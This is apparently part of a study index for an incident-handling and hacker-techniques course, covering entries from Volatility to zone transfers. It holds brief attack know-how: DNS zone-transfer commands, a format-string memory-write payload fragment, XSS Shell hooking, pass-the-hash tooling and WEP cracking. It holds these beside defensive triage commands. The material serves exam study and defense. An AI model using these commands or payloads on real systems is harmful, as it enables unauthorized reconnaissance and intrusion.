Volatility Modules: datetime, sockets, connections, timeliner, pslist, dlllist, files, procexedump, imageinfo...
Volatility Viewing Network Connections: python2.7 vol.py timeliner -f [path to mem_capture] --profile=[] | grep ESTABLISHED
Volatility Viewing Processes: python2.7 vol.py timeliner -f [path to mem_capture] --profile=WIN7SP0x86 (OS)
VSAgent (backdoor) (1: 146, 148-151, 154; 5: 137-140, 142): beacons at 10 second intervals; base64 encoded, sends over cleartext HTML
Vulnerability Scanner Defense (2: 124): Pre: close unused ports, shut unused services, patch systems, RUN CREDENTIALED SCAN. Ide: IDS
Vulnerability Scanner Limitations (2: 118): can't check vulns they don't know; can't exploit or pivot; can't correlate multiple vulns
war dialing and demon dialers (2: 18, 29, 53-58): war dialers dial a series of numbers; demon dialers brute force a single number for passwords
War Driving (2: 18, 60-75): justify business need, conduct on org, check bills, evening office modem check. Iden: PBX scanning, PBX IPS. Con: shut down modem. Erad: remove modem, change number & password
war room (1: 36): secure room with copies of evidence, locking cabinet, no windows
Warhol (4: 60-61): pre-scan internet, load worm into list, infect first vulnerable systems, spread
Warning banners (1: 21, 175): "use of the system may be monitored and recorded"; legal team should review & approve. 5 points: company use only, unauthorized access prohibited, penalties, system monitored, law enforcement
Warrant (Search/Seizure): if you receive one, contact the legal department to make sure the paperwork is correct



WarVOX (2: 54-55, 57): wardialing software, up to 8k calls/hr, caller ID spoofing
Web Application Attack Defenses (4): Pre: data integrity; hash, timestamp, encrypt info in cookie, SSL, 16 or more character session ID
Web Application Attack Defenses 2 (4: 150): Pre: use a proxy to detect when inbound traffic is altered. ModSecurity, F5 ASM, Citrix
Web Application Attack Defenses 3 (4: 151): Ide: user complaints. Con: shut down app & fix / quarantine victim account. Era: remove data...
Web Application Attack and Audit Framework (w3af) (4: 146): web app proxy, Python based; includes MitM proxy for manipulating web apps (FREE)
Web Application Firewall (WAF) (4: 101, 150)
Web Application Manipulation proxy (4): use a proxy to manipulate data in transit: account numbers, balance, shopping cart prices etc.
Web Attack Proxy tools (4): Fiddler, ZAP proxy, Burp Proxy, w3af, Odysseus/Telemachus; all manipulation proxies
Web based Recon/Attack Tools (2: 50): Shodan, dnsstuff, traceroute.org, network-tools.com, securityspace.com
Web Proxy Auto-detect (WPAD) (3: 79, 83-84)
Web scanner defense: same as vuln scanner defense + chrooted environment (can only see part of the file system)
web spider (web crawler) (2: 33): accesses every page on a site in a short time (possibly Google bot)
Webspy: re-fetches webpages based on the sniffed URL. Similar tools: Driftnet & Niksun
WEPCrack (2: 64): wireless sniffer for cracking WEP keys
wevtutil qe security /f:text > logs.txt (1: 74, 190-191): Security event logs (wevtutil), Win7
wget (4: 91; 5: 94, 99)
whitelisting (1: 158; 3: 93, 136, 145, 150; 4: 74, 87; 5: 132)
whatis and apropos (1: 243): whatis ifconfig, apropos network (= man -k network, i.e. lookup by keyword)
whoami (1: 208, 211-212, 218, 222, 229, 235, 239; 3: 33, 42; 5: 93, 98; 6: 56)
Whois (2: 18-22, 47-48, 53; 6: 23, 25-27): live with it / use the firm's name as point of contact; you can't tell you've been looked up. Lookup target at InterNIC to determine registrar, then go to the registrar to get more info
Wi-Fi Protected Access (WPA) (2: 62, 64-65, 72, 74)
win32k.sys (5: 57)
Windows Credential Editor (WCE) (4: 51): Pass-the-Hash for Kerberos, LANMAN challenge/response, NTLMv1 & v2
Windows DNS server flaw (2: 137-138): when misconfigured, accepts a DNS response with more info than asked
Windows NT (4: 16, 24-25, 32; 5: 104)
WinNuke (4: 154, 161)



Wired Equivalent Privacy (WEP) (2: 60, 62, 64-65)
Wireless driving defense 1 (2: 72): Prep: good SSID name (serial number of AP), WPA2 with AES, never TKIP
Wireless driving defense 2 (2: 73): Preparation: disable aggressive mode IKE
Wireless driving defense 3 (Ide, Con, Era, Re) (2: 74): wireless IDS (Aruba, AirMagnet, Cisco & others can DoS a rogue AP). Remove rogue APs
Wireless Misconfiguration (2: 60): default SSID, broadcast beacon 10 times/sec, cloaking sends SSID to client in clear text
Wireless sniffing tools (2: 64): tcpdump; Wireshark; OmniPeek; Aircrack-ng sniffs 50-100 MB of data to determine the WEP key; WEPCrack; ASLEAP
Wireless VPN crack (2: 72): IKEcrack and Cain can break the PSK with IPsec set to aggressive mode
Wireshark - passive sniffer (1: 43, 52; 3: 46, 131, 134): captures packets and can process already captured files. Over 500 protocols
Witty (4: 55, 57, 64)
wmic (1: 67, 70, 81-82, 126, 138, 188-189, 192; 2: 102; 4: 177-178; 5: 26-27, 34-35, 110)
wmic /node:[MachineName] /user:[] /password:[] (1: 126): look for unusual processes (works remotely)
wmic check usb and other plugged interfaces (1: 192): wmic diskdrive get interfacetype,mediatype,model
wmic get users logged in (1: 189): wmic computersystem get username
wmic get users logged in, all systems, remote cmd (1: 189): wmic /node:@systems.txt computersystem get username /format:csv
wmic on multiple systems, export to csv: wmic /node:@systems.txt product get description,name .../format:csv > inv.txt
wmic product get name,version: pull list of installed software
wmic process (1: 67, 81-82; 5: 26-27, 34-35, 110)
wmic process [pid] delete (2: 102): kill processes
wmic process get name,priority: to see a list of process priorities in Windows
wmic process where name="notepad.exe" delete (4: 178): kill multiple processes
wmic useraccount list brief (Recovery) (1: 126): look for accounts the attacker created. Or use the net user commands. cat /etc/passwd in Linux
WordWebBugs (1: 107): stolen documents with call backs, good for tracking the attacker
Worms and Bots (4: 53-74)
Worms and Bots History (4: 55): SQL Slammer, Blaster, Nachi/Welchia, Sobig.F etc.; Bagle, Netsky, MyDoom etc.; Witty, Sasser; Zotob and bot-bundling; Storm; Conficker; Stuxnet; Morto; Flame; Locky, Tiny Banker Trojan...
Worm Defense: Ethical Worms?: can be used to inoculate the internet with patches. But we can get sued
Worm examples & exploits (multi exploit) (4: 57): able to exploit multiple vulnerabilities; Nimda: IE, IIS, Outlook, 12 exploits. Ramen: 3 exploits. Conficker: buffer overflow, USB & SMB spread



Worms - Flash Technique/Warhol (4: 60): "hockey stick": pre-scan internet, load worm into list, infect first vulnerable systems, spread
Worms - Fast Spreading (4: 60): exponential; spread in the shape of a hockey stick; Warhol 99% in 15 mins, Flash 30 seconds
Worms - Metamorphic Worms (4: 65): change appearance and function, e.g. a malware that does DoS, steals CCs, user IDs
Worms - Multiplatform (4: 58): may exploit multiple OS types; in 2010 Stuxnet: Windows & SCADA systems. IIS/sadmind worm: Windows and Solaris
Worms - Polymorphic Worms (4: 62): dynamically change appearance each time they run; keep the same function
Worms - Truly Nasty Payload (4: 64): breeders consuming resources; steals info from the system; distributes bots
Worms intro and History (4: 53/55): automated attack tools that spread via networks
Worm and Bot Defenses (4: 74): Pre: buffer overflow defense, test & deploy patches, encrypt HDD. Id: AV. Con: remove from network
Wrappers (5: 18): wrap a backdoor around some other app; aka binders; wrap exes into a backdoor. SaranWrap
Write Blocker (1: 111): work with the forensic image copy in a read-only manner
Writing to memory locations: endian (inputs backwards), 2 hex = 1 ASCII, 0xbffffac0 = \xc0\xfa\xff\xbf%d%n
wtmp (/var/log/wtmp) (5: 89-90): contains data about past user logins
X-Ways Forensics (1: 41): forensics tool (commercial)
XOR (3: 97, 124, 144; 4: 63): editing assembly: PUSH, POP, MOV; XOR with itself = 0 (book 3); XORing evil code with a key (book 4)
Xplico (3: 55): pulls data from the network; can be live or reviewing a capture (offline). Stores components
xProbe2 (2: 95): fingerprinting tool; better results than nmap but smaller signature DB; uses fuzzy logic
XSS Shell: set up webserver with XSS Shell, plant hook on vulnerable site, victim browser compromised
Yoda & Themida (5: 19): packing tools to make an executable difficult to analyze
ZAP Proxy (4: 104, 146-147): supports chained proxies, stores HTML locally, imports SSL client cert, tests SQLi & XSS
Zenmap (2: 80, 84): GUI for Nmap
Zero-day Exploit worms (4: 59): e.g. Stuxnet exploited 4 zero-days in Windows target machines
zgrep (1: 155-156): uncompress Bro files
Zone Transfer (2: 24-27): attacker grabs a dump of DNS server records. Uses TCP 53
Zone Transfer Unix: dig @[DNS_server_IP] [target_domain] -t AXFR
Zone Transfer Windows: nslookup, server [server], set type=any, ls -d [domain]. tcpdump -nn port 53 and host

